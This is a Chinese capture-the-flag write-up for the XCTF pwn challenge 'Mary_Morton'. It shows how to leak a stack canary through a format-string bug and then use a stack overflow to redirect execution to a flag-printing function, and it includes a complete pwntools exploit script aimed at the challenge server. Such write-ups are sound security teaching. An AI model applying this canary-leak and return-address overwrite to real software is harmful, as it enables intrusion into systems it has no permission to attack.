[攻防世界 pwn]——Mary_Morton

[攻防世界 pwn]——Mary_Morton

  • 题目地址: https://adworld.xctf.org.cn/
  • 题目:
    [攻防世界 pwn]——Mary_Morton
    checksec看下,64位还开启了NX和canary保护。(一般开启canary保护,都有格式化字符串漏洞)
    [攻防世界 pwn]——Mary_Morton

在IDA中看看, 果然有格式化字符串漏洞
[攻防世界 pwn]——Mary_Morton
[攻防世界 pwn]——Mary_Morton
[攻防世界 pwn]——Mary_Morton
仔细看看代码会发现, 这个是个死循环, 1 里面有栈溢出, 2里面有格式化字符串漏洞, 3是退出。
我们可以先利用格式化字符串的漏洞, 泄露出canary, 然后就可以利用栈溢出修改返回地址了。
[攻防世界 pwn]——Mary_Morton
[攻防世界 pwn]——Mary_Morton
最近我学了一个新的, 计算偏移的方法,很好用。当然你也可以下断点自己在gdb里面自己看, 自己调试
[攻防世界 pwn]——Mary_Morton
一般写八个就够了, 基本都在8个偏移以内,和自身的偏移。好像好多都是6, 这个也是。
因为61对应97就是a
然后找一下canary和输入之间的偏移
[攻防世界 pwn]——Mary_Morton[攻防世界 pwn]——Mary_Morton
所以最终的偏移为 17 + 6 =23
我们还知道cat_flag的地址

exploit

from pwn import *
p=remote('111.200.241.244',42124)

p.sendlineafter('3. Exit the battle','2')
p.sendline('%23$p')

p.recvuntil('0x')
canary=int(p.recv(16),16)
print "canary:  " + hex(canary)

flag_addr=0x4008da
payload='a'*0x88+p64(canary)+'a'*8+p64(flag_addr)
p.sendlineafter('3. Exit the battle','1')
p.sendline(payload)

p.interactive()
上一篇:8月14日pwn学习


下一篇:PWN学习笔记(一)Basic Rop